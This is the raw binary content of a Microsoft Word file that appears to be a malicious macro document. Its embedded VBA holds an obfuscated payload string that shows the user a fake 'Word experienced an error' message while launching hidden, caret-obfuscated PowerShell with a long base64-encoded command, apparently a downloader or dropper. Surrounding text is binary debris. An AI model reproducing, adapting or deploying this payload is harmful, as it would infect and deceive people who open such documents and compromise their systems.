bjbj
mH	4nH	
sH	4tH	
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
sQ}#
theme/theme/theme1.xml
"GJK
TcKBc
v[`E
'.Lq
yDQ"Q
Z6/H
ud9c
J{rJ
Q/B)L
lC=h
W!alf
AXl:X
PxzSq]y<u
n6	m
;B=s!
q5;3
BU`M
b!e9#i
`571
W	0xn?G
theme/theme/_rels/themeManager.xml.rels
6?$Q
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Administrator
Normal.dotm
Microsoft Office Word
Title
 D.f
0Word.
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal.
Global
Spac
jFal
Creat
Pred
ecla
@Expo
Templ
ateDeriv
#Customi
_]5n
@]E[_]A
  pa
yload =
[ed"
,)V%
8	+e
c[_]m[_]d[_] [_]c[_]m[_]d[_] [_]c[_]m[_]d[_] [_]c[_]m[_]d[_] [_]/[_]c[_] [_]m[_]s[_]g[_] [_]%[_]u[_]s[_]e[_]r[_]n[_]a[_]m[_]e[_]%[_] [_]/[_]v[_] [_]W[_]o[_]r[_]d[_] [_]e[_]x[_]p[_]e[_]r[_]i[_]e[_]n[_]c[_]e[_]d[_] [_]a[_]n[_] [_]e[_]r[_]r[_]o[_]r[_] [_]t[_]r[_]y[_]i[_]n[_]g[_] [_]t[_]o[_] [_]o[_]p[_]e[_]n[_] [_]t[_]h[_]e[_] [_]f[_]i[_]l[_]e[_].[_] [_]&[_] [_]P[_]^[_]O[_]w[_]^[_]e[_]r[_]^[_]s[_]h[_]e[_]^[_]L[_]^[_]L[_] [_]-[_]w[_] [_]h[_]i[_]d[_]d[_]e[_]n[_] [_]-[_]E[_]N[_]C[_]O[_]D[_] [_] [_]U[_]w[_]
B[_]F[_]A[_]F[_]Q[_]A[_]L[_]Q[_]B[_]W[_]A[_]G[_]E[_]A[_]c[_]g[_]B[_]J[_]A[_]E[_]E[_]A[_]Q[_]g[_]B[_]s[_]A[_]G[_]U[_]A[_]I[_]A[_]A[_]g[_]A[_]D[_]g[_]A[_]a[_]Q[_]B[_]o[_]A[_]D[_]U[_]A[_]N[_]g[_]A[_]3[_]A[_]C[_]A[_]A[_]I[_]A[_]A[_]o[_]A[_]C[_]A[_]A[_]I[_]A[_]B[_]b[_]A[_]H[_]Q[_]A[_]W[_]Q[_]B[_]w[_]A[_]G[_]U[_]A[_]X[_]Q[_]A[_]o[_]A[_]C[_]I[_]A[_]e[_]w[_]A[_]z[_]A[_]H[_]0[_]A[_]e[_]w[_]A[_]w[_]A[_]H[_]0[_]A[_]e[_]w[_]A[_]0[_]A[_]H[_]0[_]A[_]e[_]w[_]A[_]y[_]A[_]H[_]0[_]A[_]e[_]w[_]A[_]x[_]A[_]H[_]0[_]
A[_]I[_]g[_]A[_]t[_]A[_]G[_]Y[_]A[_]J[_]w[_]B[_]Z[_]A[_]H[_]M[_]A[_]V[_]A[_]A[_]n[_]A[_]C[_]w[_]A[_]J[_]w[_]B[_]S[_]A[_]G[_]U[_]A[_]Y[_]w[_]B[_]U[_]A[_]E[_]8[_]A[_]U[_]g[_]B[_]5[_]A[_]C[_]c[_]A[_]L[_]A[_]A[_]n[_]A[_]E[_]0[_]A[_]L[_]g[_]B[_]p[_]A[_]E[_]8[_]A[_]L[_]g[_]B[_]E[_]A[_]E[_]k[_]A[_]J[_]w[_]A[_]s[_]A[_]C[_]c[_]A[_]c[_]w[_]A[_]n[_]A[_]C[_]w[_]A[_]J[_]w[_]B[_]l[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]p[_]A[_]D[_]s[_]A[_]I[_]A[_]A[_]g[_]A[_]C[_]A[_]A[_]U[_]w[_]B[_]F[_]A[_]F[_]Q[_]A[_]L[_]Q[_]B[_]J[_]
A[_]H[_]Q[_]A[_]Z[_]Q[_]B[_]t[_]A[_]C[_]A[_]A[_]K[_]A[_]A[_]i[_]A[_]H[_]Y[_]A[_]Q[_]Q[_]A[_]i[_]A[_]C[_]s[_]A[_]I[_]g[_]B[_]S[_]A[_]G[_]k[_]A[_]Q[_]Q[_]A[_]i[_]A[_]C[_]s[_]A[_]I[_]g[_]B[_]i[_]A[_]E[_]w[_]A[_]Z[_]Q[_]A[_]6[_]A[_]F[_]I[_]A[_]I[_]g[_]A[_]r[_]A[_]C[_]I[_]A[_]a[_]Q[_]A[_]i[_]A[_]C[_]s[_]A[_]I[_]g[_]A[_]3[_]A[_]H[_]g[_]A[_]T[_]w[_]A[_]z[_]A[_]C[_]I[_]A[_]K[_]Q[_]A[_]g[_]A[_]C[_]g[_]A[_]W[_]w[_]B[_]U[_]A[_]H[_]k[_]A[_]U[_]A[_]B[_]l[_]A[_]F[_]0[_]A[_]K[_]A[_]A[_]i[_]A[_]H[_]s[_]A[_]M[_]
g[_]B[_]9[_]A[_]H[_]s[_]A[_]N[_]Q[_]B[_]9[_]A[_]H[_]s[_]A[_]N[_]A[_]B[_]9[_]A[_]H[_]s[_]A[_]M[_]w[_]B[_]9[_]A[_]H[_]s[_]A[_]M[_]Q[_]B[_]9[_]A[_]H[_]s[_]A[_]M[_]A[_]B[_]9[_]A[_]C[_]I[_]A[_]L[_]Q[_]B[_]G[_]A[_]C[_]A[_]A[_]J[_]w[_]B[_]S[_]A[_]C[_]c[_]A[_]L[_]A[_]A[_]n[_]A[_]E[_]0[_]A[_]Y[_]Q[_]B[_]O[_]A[_]G[_]E[_]A[_]R[_]w[_]B[_]F[_]A[_]C[_]c[_]A[_]L[_]A[_]A[_]n[_]A[_]F[_]M[_]A[_]J[_]w[_]A[_]s[_]A[_]C[_]c[_]A[_]V[_]g[_]B[_]J[_]A[_]G[_]M[_]A[_]R[_]Q[_]B[_]Q[_]A[_]G[_]8[_]A[_]S[_]Q[_]B[_]u[_]A[_]H[_]
Q[_]A[_]J[_]w[_]A[_]s[_]A[_]C[_]c[_]A[_]L[_]g[_]B[_]u[_]A[_]G[_]U[_]A[_]V[_]A[_]A[_]u[_]A[_]H[_]M[_]A[_]R[_]Q[_]B[_]y[_]A[_]C[_]c[_]A[_]L[_]A[_]A[_]n[_]A[_]F[_]k[_]A[_]c[_]w[_]B[_]0[_]A[_]G[_]U[_]A[_]b[_]Q[_]A[_]n[_]A[_]C[_]k[_]A[_]I[_]A[_]A[_]p[_]A[_]C[_]A[_]A[_]I[_]A[_]A[_]7[_]A[_]C[_]A[_]A[_]I[_]A[_]A[_]k[_]A[_]E[_]U[_]A[_]c[_]g[_]B[_]y[_]A[_]G[_]8[_]A[_]c[_]g[_]B[_]B[_]A[_]G[_]M[_]A[_]d[_]A[_]B[_]p[_]A[_]G[_]8[_]A[_]b[_]g[_]B[_]Q[_]A[_]H[_]I[_]A[_]Z[_]Q[_]B[_]m[_]A[_]G[_]U[_]A[_]c[_]g[_]B[_]
*3***3 
l[_]A[_]G[_]4[_]A[_]Y[_]w[_]B[_]l[_]A[_]C[_]A[_]A[_]P[_]Q[_]A[_]g[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]T[_]A[_]G[_]k[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]s[_]A[_]G[_]U[_]A[_]b[_]g[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]0[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]s[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]H[_]k[_]A[_]Q[_]w[_]B[_]v[_]A[_]G[_]4[_]A[_]d[_]A[_]A[_]n[_]A[_]C[_]k[_]A[_]K[_]w[_]A[_]n[_]A[_]G[_]k[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]u[_]A[_]C[_]c[_]A[_]
K[_]w[_]A[_]n[_]A[_]H[_]U[_]A[_]Z[_]Q[_]A[_]n[_]A[_]C[_]k[_]A[_]K[_]Q[_]A[_]7[_]A[_]C[_]Q[_]A[_]d[_]g[_]B[_]h[_]A[_]H[_]I[_]A[_]X[_]w[_]B[_]B[_]A[_]D[_]0[_]A[_]J[_]A[_]B[_]Q[_]A[_]D[_]U[_]A[_]O[_]A[_]B[_]C[_]A[_]C[_]A[_]A[_]K[_]w[_]A[_]g[_]A[_]F[_]s[_]A[_]Y[_]w[_]B[_]o[_]A[_]G[_]E[_]A[_]c[_]g[_]B[_]d[_]A[_]C[_]g[_]A[_]N[_]g[_]A[_]0[_]A[_]C[_]k[_]A[_]I[_]A[_]A[_]r[_]A[_]C[_]A[_]A[_]J[_]A[_]B[_]a[_]A[_]D[_]E[_]A[_]O[_]Q[_]B[_]S[_]A[_]D[_]s[_]A[_]J[_]A[_]B[_]C[_]A[_]D[_]U[_]A[_]M[_]w[_]B[_]O[_]A[_]
D[_]0[_]A[_]K[_]A[_]A[_]o[_]A[_]C[_]c[_]A[_]U[_]w[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]A[_]3[_]A[_]D[_]c[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]I[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]7[_]A[_]C[_]A[_]A[_]I[_]A[_]A[_]o[_]A[_]C[_]A[_]A[_]I[_]A[_]B[_]s[_]A[_]H[_]M[_]A[_]I[_]A[_]A[_]g[_]A[_]F[_]Y[_]A[_]Y[_]Q[_]B[_]y[_]A[_]E[_]k[_]A[_]Y[_]Q[_]B[_]C[_]A[_]E[_]w[_]A[_]R[_]Q[_]A[_]6[_]A[_]D[_]g[_]A[_]a[_]Q[_]B[_]o[_]A[_]D[_]U[_]A[_]N[_]g[_]A[_]3[_]A[_]C[_]A[_]A[_]I[_]A[_]A[_]p[_]A[_]C[_]4[_]A[_]V[_]g[_]
B[_]h[_]A[_]G[_]w[_]A[_]d[_]Q[_]B[_]l[_]A[_]D[_]o[_]A[_]O[_]g[_]A[_]i[_]A[_]E[_]M[_]A[_]U[_]g[_]B[_]F[_]A[_]E[_]E[_]A[_]d[_]A[_]B[_]g[_]A[_]E[_]U[_]A[_]Y[_]A[_]B[_]E[_]A[_]G[_]A[_]A[_]a[_]Q[_]B[_]S[_]A[_]G[_]U[_]A[_]Y[_]w[_]B[_]U[_]A[_]E[_]8[_]A[_]c[_]g[_]B[_]Z[_]A[_]C[_]I[_]A[_]K[_]A[_]A[_]k[_]A[_]E[_]g[_]A[_]T[_]w[_]B[_]N[_]A[_]E[_]U[_]A[_]I[_]A[_]A[_]r[_]A[_]C[_]A[_]A[_]K[_]A[_]A[_]o[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]l[_]A[_]E[_]4[_]A[_]N[_]w[_]B[_]S[_]A[_]H[_]I[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]
A[_]M[_]Q[_]B[_]z[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]G[_]o[_]A[_]O[_]Q[_]B[_]h[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]G[_]U[_]A[_]T[_]g[_]A[_]n[_]A[_]C[_]k[_]A[_]K[_]w[_]A[_]n[_]A[_]D[_]c[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]C[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]G[_]M[_]A[_]e[_]A[_]A[_]n[_]A[_]C[_]k[_]A[_]K[_]w[_]A[_]o[_]A[_]C[_]c[_]A[_]N[_]A[_]B[_]p[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]G[_]E[_]A[_]e[_]Q[_]B[_]l[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]r[_]A[_]C[_]c[_]A[_]T[_]g[_]A[_]3[_]
A[_]C[_]c[_]A[_]K[_]Q[_]A[_]u[_]A[_]C[_]I[_]A[_]c[_]g[_]B[_]l[_]A[_]F[_]A[_]A[_]Y[_]A[_]B[_]M[_]A[_]G[_]E[_]A[_]Y[_]A[_]B[_]j[_]A[_]E[_]U[_]A[_]I[_]g[_]A[_]o[_]A[_]C[_]g[_]A[_]W[_]w[_]B[_]D[_]A[_]E[_]g[_]A[_]Y[_]Q[_]B[_]S[_]A[_]F[_]0[_]A[_]M[_]Q[_]A[_]w[_]A[_]D[_]E[_]A[_]K[_]w[_]B[_]b[_]A[_]E[_]M[_]A[_]S[_]A[_]B[_]h[_]A[_]F[_]I[_]A[_]X[_]Q[_]A[_]3[_]A[_]D[_]g[_]A[_]K[_]w[_]B[_]b[_]A[_]E[_]M[_]A[_]S[_]A[_]B[_]h[_]A[_]F[_]I[_]A[_]X[_]Q[_]A[_]1[_]A[_]D[_]U[_]A[_]K[_]Q[_]A[_]s[_]A[_]E[_]g[_]A[_]X[_]
w[_]B[_]U[_]A[_]H[_]I[_]A[_]a[_]Q[_]B[_]u[_]A[_]E[_]c[_]A[_]X[_]Q[_]B[_]b[_]A[_]E[_]M[_]A[_]S[_]A[_]B[_]h[_]A[_]F[_]I[_]A[_]X[_]Q[_]A[_]5[_]A[_]D[_]I[_]A[_]K[_]Q[_]A[_]p[_]A[_]C[_]k[_]A[_]O[_]w[_]A[_]k[_]A[_]F[_]Y[_]A[_]N[_]Q[_]A[_]3[_]A[_]F[_]I[_]A[_]P[_]Q[_]A[_]o[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]C[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]D[_]Q[_]A[_]N[_]g[_]A[_]n[_]A[_]C[_]k[_]A[_]K[_]w[_]A[_]n[_]A[_]F[_]Y[_]A[_]J[_]w[_]A[_]p[_]A[_]D[_]s[_]A[_]I[_]A[_]A[_]o[_]A[_]H[_]Y[_]A[_]Y[_]Q[_]B[_]S[_]A[_]E[_]
k[_]A[_]Y[_]Q[_]B[_]C[_]A[_]G[_]w[_]A[_]Z[_]Q[_]A[_]g[_]A[_]C[_]g[_]A[_]I[_]g[_]B[_]S[_]A[_]C[_]I[_]A[_]K[_]w[_]A[_]i[_]A[_]G[_]k[_]A[_]I[_]g[_]A[_]r[_]A[_]C[_]I[_]A[_]N[_]w[_]B[_]4[_]A[_]E[_]8[_]A[_]M[_]w[_]A[_]i[_]A[_]C[_]k[_]A[_]I[_]A[_]A[_]p[_]A[_]C[_]4[_]A[_]V[_]g[_]B[_]B[_]A[_]G[_]w[_]A[_]V[_]Q[_]B[_]F[_]A[_]D[_]o[_]A[_]O[_]g[_]A[_]i[_]A[_]F[_]M[_]A[_]Z[_]Q[_]B[_]D[_]A[_]H[_]U[_]A[_]c[_]g[_]B[_]J[_]A[_]G[_]A[_]A[_]V[_]A[_]B[_]g[_]A[_]H[_]k[_]A[_]U[_]A[_]B[_]g[_]A[_]F[_]I[_]A[_]T[_]w[_]B[_]
g[_]A[_]F[_]Q[_]A[_]b[_]w[_]B[_]D[_]A[_]E[_]8[_]A[_]T[_]A[_]A[_]i[_]A[_]C[_]A[_]A[_]P[_]Q[_]A[_]g[_]A[_]C[_]g[_]A[_]K[_]A[_]A[_]n[_]A[_]F[_]Q[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]b[_]A[_]B[_]z[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]r[_]A[_]C[_]c[_]A[_]M[_]Q[_]A[_]y[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]7[_]A[_]C[_]Q[_]A[_]W[_]A[_]A[_]0[_]A[_]D[_]Q[_]A[_]U[_]w[_]A[_]9[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]T[_]A[_]D[_]g[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]M[_]Q[_]B[_]E[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]7[_]A[_]C[_]Q[_]A[_]
U[_]A[_]B[_]h[_]A[_]D[_]I[_]A[_]b[_]g[_]B[_]1[_]A[_]H[_]I[_]A[_]N[_]A[_]A[_]g[_]A[_]D[_]0[_]A[_]I[_]A[_]A[_]o[_]A[_]C[_]c[_]A[_]S[_]w[_]A[_]n[_]A[_]C[_]s[_]A[_]K[_]A[_]A[_]n[_]A[_]F[_]8[_]A[_]O[_]Q[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]P[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]p[_]A[_]D[_]s[_]A[_]J[_]A[_]B[_]P[_]A[_]D[_]Y[_]A[_]N[_]g[_]B[_]H[_]A[_]D[_]0[_]A[_]K[_]A[_]A[_]o[_]A[_]C[_]c[_]A[_]R[_]g[_]A[_]4[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]D[_]g[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]X[_]A[_]
C[_]c[_]A[_]K[_]Q[_]A[_]7[_]A[_]C[_]Q[_]A[_]Q[_]w[_]B[_]5[_]A[_]G[_]c[_]A[_]M[_]A[_]B[_]r[_]A[_]H[_]U[_]A[_]N[_]w[_]A[_]9[_]A[_]C[_]Q[_]A[_]S[_]A[_]B[_]P[_]A[_]E[_]0[_]A[_]R[_]Q[_]A[_]r[_]A[_]C[_]g[_]A[_]K[_]A[_]A[_]o[_]A[_]C[_]c[_]A[_]Z[_]Q[_]B[_]B[_]A[_]H[_]c[_]A[_]U[_]g[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]y[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]A[_]x[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]H[_]M[_]A[_]a[_]g[_]A[_]5[_]A[_]G[_]E[_]A[_]Z[_]Q[_]B[_]B[_]A[_]C[_]c[_]A[_]K[_]Q[_]
A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]3[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]E[_]I[_]A[_]Y[_]w[_]B[_]4[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]A[_]0[_]A[_]G[_]k[_]A[_]Y[_]Q[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]5[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]G[_]U[_]A[_]Q[_]Q[_]A[_]n[_]A[_]C[_]k[_]A[_]K[_]w[_]A[_]n[_]A[_]H[_]c[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]A[_]A[_]L[_]Q[_]B[_]y[_]A[_]G[_]U[_]A[_]c[_]A[_]B[_]M[_]A[_]E[_]E[_]A[_]Q[_]w[_]B[_]l[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]l[_]A[_]E[_]E[_]
A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]d[_]w[_]A[_]n[_]A[_]C[_]k[_]A[_]L[_]A[_]B[_]b[_]A[_]G[_]M[_]A[_]a[_]A[_]B[_]h[_]A[_]F[_]I[_]A[_]X[_]Q[_]A[_]5[_]A[_]D[_]I[_]A[_]K[_]Q[_]A[_]r[_]A[_]C[_]Q[_]A[_]U[_]A[_]B[_]h[_]A[_]D[_]I[_]A[_]b[_]g[_]B[_]1[_]A[_]H[_]I[_]A[_]N[_]A[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]A[_]u[_]A[_]G[_]Q[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]b[_]A[_]B[_]s[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]7[_]A[_]C[_]Q[_]A[_]R[_]Q[_]A[_]w[_]A[_]D[_]E[_]A[_]Q[_]g[_]A[_]9[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]S[_]
A[_]D[_]c[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]X[_]w[_]B[_]T[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]7[_]A[_]C[_]Q[_]A[_]T[_]Q[_]B[_]y[_]A[_]G[_]s[_]A[_]a[_]g[_]B[_]j[_]A[_]G[_]k[_]A[_]b[_]Q[_]A[_]9[_]A[_]C[_]g[_]A[_]K[_]A[_]A[_]n[_]A[_]F[_]0[_]A[_]Y[_]g[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]A[_]y[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]r[_]A[_]C[_]c[_]A[_]S[_]A[_]B[_]f[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]o[_]A[_]C[_]c[_]A[_]c[_]w[_]A[_]6[_]A[_]C[_]8[_]A[_]L[_]w[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]j[_]A[_]G[_]Q[_]A[_]b[_]
g[_]A[_]u[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]r[_]A[_]C[_]c[_]A[_]Y[_]g[_]B[_]h[_]A[_]G[_]4[_]A[_]Z[_]A[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]p[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]H[_]Q[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]e[_]Q[_]A[_]n[_]A[_]C[_]s[_]A[_]K[_]A[_]A[_]n[_]A[_]G[_]U[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]d[_]A[_]B[_]p[_]A[_]C[_]4[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]s[_]A[_]K[_]A[_]A[_]n[_]A[_]H[_]Q[_]A[_]a[_]A[_]B[_]t[_]A[_]C[_]8[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]Z[_]g[_]B[_]p[_]A[_]G[_]
w[_]A[_]Z[_]Q[_]B[_]z[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]A[_]v[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]G[_]0[_]A[_]e[_]Q[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]z[_]A[_]H[_]Q[_]A[_]Z[_]Q[_]B[_]y[_]A[_]H[_]k[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]s[_]A[_]K[_]A[_]A[_]n[_]A[_]G[_]c[_]A[_]a[_]Q[_]B[_]m[_]A[_]H[_]Q[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]L[_]g[_]B[_]l[_]A[_]H[_]g[_]A[_]Z[_]Q[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]A[_]A[_]F[_]0[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]Y[_]g[_]A[_]
y[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]I[_]A[_]F[_]8[_]A[_]c[_]w[_]A[_]6[_]A[_]C[_]8[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]L[_]w[_]A[_]n[_]A[_]C[_]k[_]A[_]K[_]w[_]A[_]o[_]A[_]C[_]c[_]A[_]Z[_]w[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]v[_]A[_]G[_]8[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]Z[_]w[_]B[_]s[_]A[_]G[_]U[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]s[_]A[_]K[_]A[_]A[_]n[_]A[_]C[_]4[_]A[_]Y[_]w[_]B[_]v[_]A[_]G[_]0[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]s[_]A[_]K[_]A[_]A[_]n[_]A[_]C[_]8[_]A[_]
J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]Q[_]A[_]B[_]d[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]i[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]D[_]I[_]A[_]S[_]A[_]B[_]f[_]A[_]H[_]M[_]A[_]O[_]g[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]A[_]v[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]C[_]8[_]A[_]d[_]w[_]B[_]3[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]3[_]A[_]C[_]4[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]c[_]w[_]A[_]n[_]A[_]C[_]k[_]A[_]K[_]w[_]A[_]o[_]A[_]C[_]c[_]A[_]Z[_]Q[_]B[_]j[_]A[_]
H[_]I[_]A[_]Z[_]Q[_]B[_]0[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]F[_]M[_]A[_]Y[_]Q[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]u[_]A[_]H[_]Q[_]A[_]Y[_]Q[_]A[_]n[_]A[_]C[_]k[_]A[_]K[_]w[_]A[_]o[_]A[_]C[_]c[_]A[_]L[_]g[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]U[_]A[_]E[_]g[_]A[_]T[_]Q[_]A[_]n[_]A[_]C[_]k[_]A[_]K[_]w[_]A[_]n[_]A[_]C[_]8[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]H[_]A[_]G[_]8[_]A[_]b[_]A[_]B[_]k[_]A[_]G[_]U[_]A[_]b[_]g[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]0[_]A[_]G[_]k[_]A[_]J[_]w[_]
A[_]p[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]j[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]G[_]s[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]l[_]A[_]H[_]Q[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]L[_]w[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]U[_]A[_]E[_]g[_]A[_]T[_]Q[_]B[_]f[_]A[_]E[_]0[_]A[_]W[_]Q[_]B[_]T[_]A[_]F[_]Q[_]A[_]R[_]Q[_]B[_]S[_]A[_]F[_]k[_]A[_]X[_]w[_]B[_]G[_]A[_]E[_]w[_]A[_]Q[_]Q[_]B[_]H[_]A[_]E[_]A[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]d[_]A[_]G[_]I[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]g[_]
A[_]J[_]w[_]A[_]y[_]A[_]E[_]g[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]X[_]w[_]B[_]z[_]A[_]D[_]o[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]s[_]A[_]K[_]A[_]A[_]n[_]A[_]C[_]8[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]L[_]w[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]j[_]A[_]G[_]Q[_]A[_]b[_]g[_]A[_]n[_]A[_]C[_]k[_]A[_]K[_]w[_]A[_]o[_]A[_]C[_]c[_]A[_]L[_]g[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]i[_]A[_]G[_]E[_]A[_]b[_]g[_]B[_]k[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]G[_]k[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]0[_]
A[_]H[_]k[_]A[_]Z[_]Q[_]A[_]n[_]A[_]C[_]s[_]A[_]K[_]A[_]A[_]n[_]A[_]H[_]Q[_]A[_]a[_]Q[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]A[_]u[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]r[_]A[_]C[_]c[_]A[_]V[_]A[_]B[_]I[_]A[_]E[_]0[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]A[_]v[_]A[_]G[_]Y[_]A[_]a[_]Q[_]B[_]s[_]A[_]G[_]U[_]A[_]c[_]w[_]A[_]v[_]A[_]G[_]k[_]A[_]b[_]g[_]B[_]k[_]A[_]G[_]U[_]A[_]e[_]A[_]A[_]v[_]A[_]C[_]k[_]A[_]L[_]g[_]A[_]g[_]A[_]C[_]I[_]A[_]c[_]g[_]B[_]F[_]A[_]F[_]A[_]A[_]b[_]A[_]B[_]B[_]A[_]G[_]A[_]A[_]Y[_]
